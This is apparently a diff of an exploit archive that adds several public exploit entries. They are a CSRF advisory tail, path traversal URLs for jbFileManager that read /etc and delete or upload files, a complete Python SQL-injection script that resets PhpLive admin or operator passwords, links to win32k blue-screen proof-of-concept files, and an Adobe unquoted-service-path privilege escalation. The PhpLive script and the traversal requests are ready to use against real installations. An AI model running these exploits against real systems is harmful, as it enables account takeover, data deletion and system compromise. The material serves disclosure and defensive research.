-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="event_notification_on"
n
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="cron_type"
cron
-----------------------------305761854111129072091034307
Content-Disposition: form-data; name="edit_settings"
yes
-----------------------------305761854111129072091034307--
There is NOT csrf token at all. Furthermore, application does not validated
current password.
--
Sr. Information Security Engineer
https://www.mehmetince.net

57
platforms/php/webapps/39956.txt Executable file
View file

@ -0,0 +1,57 @@
# Exploit Title: jbFileManager - Path Traversal(view/add/delete)
# Date: 2016-06-15
# Exploit Author: HaHwul
# Exploit Author Blog: www.hahwul.com
# Vendor Homepage: https://github.com/ismiranda/jbFileManager
# Software Link: https://github.com/ismiranda/jbFileManager/archive/master.zip
# Version: Latest commit
# Tested on: Debian [wheezy]
### Vulnerability Code
View dir
http://127.0.0.1/vul_test/jbFileManager/jbfm/jbfm.php?act=open&path=/../../../../../../../../../etc/
Delete file/dir
http://127.0.0.1/vul_test/jbFileManager/jbfm/jbfm.php?act=del&file=/../../deltest
Add file/dir
POST /vul_test/jbFileManager/jbfm/jbfm.php?act=upload&path=/jbfm/../../ HTTP/1.1
Host: 127.0.0.1
..snip..
Content-Type: multipart/form-data; boundary=---------------------------218453159691639901924454468
Content-Length: 232
-----------------------------218453159691639901924454468
Content-Disposition: form-data; name="file"; filename="123.txt"
Content-Type: text/plain
asdfjasldfjaslkfjl
-----------------------------218453159691639901924454468--
### Vulnerability Request/Response -> View dir
View
GET /vul_test/jbFileManager/jbfm/jbfm.php?act=open&path=/../../../../../../../../../etc/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://127.0.0.1/vul_test/jbFileManager/jbfm/
Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; PHPSESSID=rk2mj70ukt2489t4hrrsj5mr33; jiathis_rdc=%7B%22http%3A//127.0.0.1/vul_test/KodExplore/index.php%22%3A%220%7C1465950328195%22%7D
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 15 Jun 2016 08:53:39 GMT
Server: Apache/2.4.10 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 12955
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
[{"name":"libaudit.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/libaudit.conf","class":"undefined"},{"name":"qemu-ifup","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/qemu-ifup","class":"undefined"},{"name":"rsyslog.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rsyslog.conf","class":"undefined"},{"name":"smi.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/smi.conf","class":"undefined"},{"name":"inputrc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/inputrc","class":"undefined"},{"name":"shadow-","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/shadow-","class":"undefined"},{"name":"rpc","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/rpc","class":"undefined"},{"name":"host.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/host.conf","class":"undefined"},{"name":"issue","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/issue","class":"undefined"},{"name":"ltrace.conf","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/ltrace.conf","class":"undefined"},{"name":"subuid","link":"\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/\/subuid","class":"undefined"},
...snip...

117
platforms/php/webapps/39957.py Executable file
View file

@ -0,0 +1,117 @@
#!/bin/env python
################################################################################################
# Exploit title: Password Recovery Sql Injection
# Exploit Author: Tiago Carvalho
# Vendor Homepage: http://www.phplivesupport.com/?plk=osicodes-5-ykq-m
# Version : 4.4.8 - 4.5.4
# Product Name: Phplive
# Tested on: Debian \ Kali linux 2016-1
################################################################################################
"""
Their are multiple sql injection vunlerabilities in this product.
The exploit uses the sql injection vulnerability on the last step of the password recovery process
and force the application to rest the password and show the username, without requiring authentication
or to ever execute the first step, the vulnerability allows the recovery of both admin and operator.
Vulnerable code location: API/Setup/get.php
The filtering in place allows alphanumeric and restricts the use of serveral special chars,
its use of mysql escape functions and stripslashes are bypassed by since theirs no need to inject
special char to create a valid statement.
FUNCTION Setup_get_InfoByID( &$dbh,
$adminid )
{
if ( $adminid == "" )
return false ;
LIST( $adminid ) = database_mysql_quote( $dbh, $adminid ) ;
$query = "SELECT * FROM p_admins WHERE adminID = $adminid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
Vulnerable code location: /API/Ops/get.php
FUNCTION Ops_get_OpInfoByID( &$dbh,
$opid )
{
if ( $opid == "" )
return false ;
LIST( $opid ) = database_mysql_quote( $dbh, $opid ) ;
$query = "SELECT * FROM p_operators WHERE opID = $opid LIMIT 1" ;
database_mysql_query( $dbh, $query ) ;
if ( $dbh[ 'ok' ] )
{
$data = database_mysql_fetchrow( $dbh ) ;
return $data ;
}
return false ;
}
"""
import re
import urllib2
import md5
import string
import argparse
match = re.compile(r"<div\sclass=\"edit_title\".*?>(.*)</div>", re.MULTILINE)
server_url = "localhost/phplive"
def build_payload(host, sql, search_exp, target, last_active, passwd):
req_url = "http://%s/index.php%s"
url_params = "?v=%s&%s=0+%s"
str = sql % (last_active, passwd, search_exp)
pwd_verify = md5.new("%d%d" % (last_active,passwd)).hexdigest()
url_params = url_params % (pwd_verify,target,str)
return req_url % (host, url_params)
def exploit(host, admin, last_active, passwd):
if admin:
target="adminid"
sql = "union+all+select+adminid,created,%d,status,ses,login,%d,email+from+p_admins+where+login+like+%s25"
else:
target="opid"
sql = "union+all+select+opid,%d,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,login,%d,0,0,0,0,0,0+from+p_operators+where+login+like+%s25"
char_list = list(string.ascii_letters)
for char in char_list:
payload = build_payload(host, sql, hex(ord(char)), target=target, last_active=last_active, passwd=passwd)
request = urllib2.urlopen(payload)
if request.code == 200:
html = request.read()
result = match.findall(html)
if len(result) == 2 and result[1]:
print "[*]\tSUCCESS!!!!!"
print "[*]\t%s %s" % (re.sub("<span.*?>|</span>","",result[0]), result[1])
break
# exploit(server_url, admin=False, last_active=1, passwd=1)
if __name__ == '__main__':
admin = True
parser = argparse.ArgumentParser(description='PhpLive 4.4.8 Password Recovery Sql injection Exploit')
parser.add_argument("-u", "--url", help="url host|ipaddress/path eg: localhost/phplive")
parser.add_argument("-o", "--operator", help="Execute operators password reset", action="store_true")
parser.add_argument("-l", "--lastactive", help="Last active date (int)", type=int, default=0)
parser.add_argument("-p", "--passwd", help="Password (int)", type=int, default=0)
args = parser.parse_args()
if args.operator:
print "[*]\toperator password reset"
admin = False
exploit(args.url, admin, args.lastactive, args.passwd)

8
platforms/windows/dos/39959.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=746
The attached PoC triggers a blue screen on Windows 7 with special pool enabled on win32k.sys . A reference to the bitmap object still exists in the device context after it has been deleted.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39959.zip

8
platforms/windows/dos/39960.txt Executable file
View file

@ -0,0 +1,8 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=747
The attached PoC crashes 32-bit Windows 7 with special pool enabled on win32k.sys. It might take several runs in order to reproduce. Tested the PoC on a single core VM.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39960.zip

43
platforms/windows/local/39954.txt Executable file
View file

@ -0,0 +1,43 @@
----------------------------------------------------------------------------------------------------------
# Exploit Title: AdobeUpdateService - Privilege Escalation Unquoted Service Path vulnerability
# Date: 18/05/2016
# Exploit Author : Cyril Vallicari
# Vendor Homepage: http://www.adobe.com/fr/
# Software Link: http://www.adobe.com/downloads.html
# Version: 3.6.0.248
# Tested on: Windows 7 x64 SP1 (but it should works on all windows version)
The application suffers from an unquoted search path issue impacting the service 'AdobeUpdateService' for Windows deployed as part of Adobe Creative Cloud
This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges on the system.
POC :
C:\Users\Utilisateur>sc qc AdobeUpdateService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AdobeUpdateService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : AdobeUpdateService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
Video POC : https://www.youtube.com/watch?v=RyzYkd05xM4
Patch :
Fixed in version 3.7.0.271
Additional notes :
https://helpx.adobe.com/security/products/creative-cloud/apsb16-21.html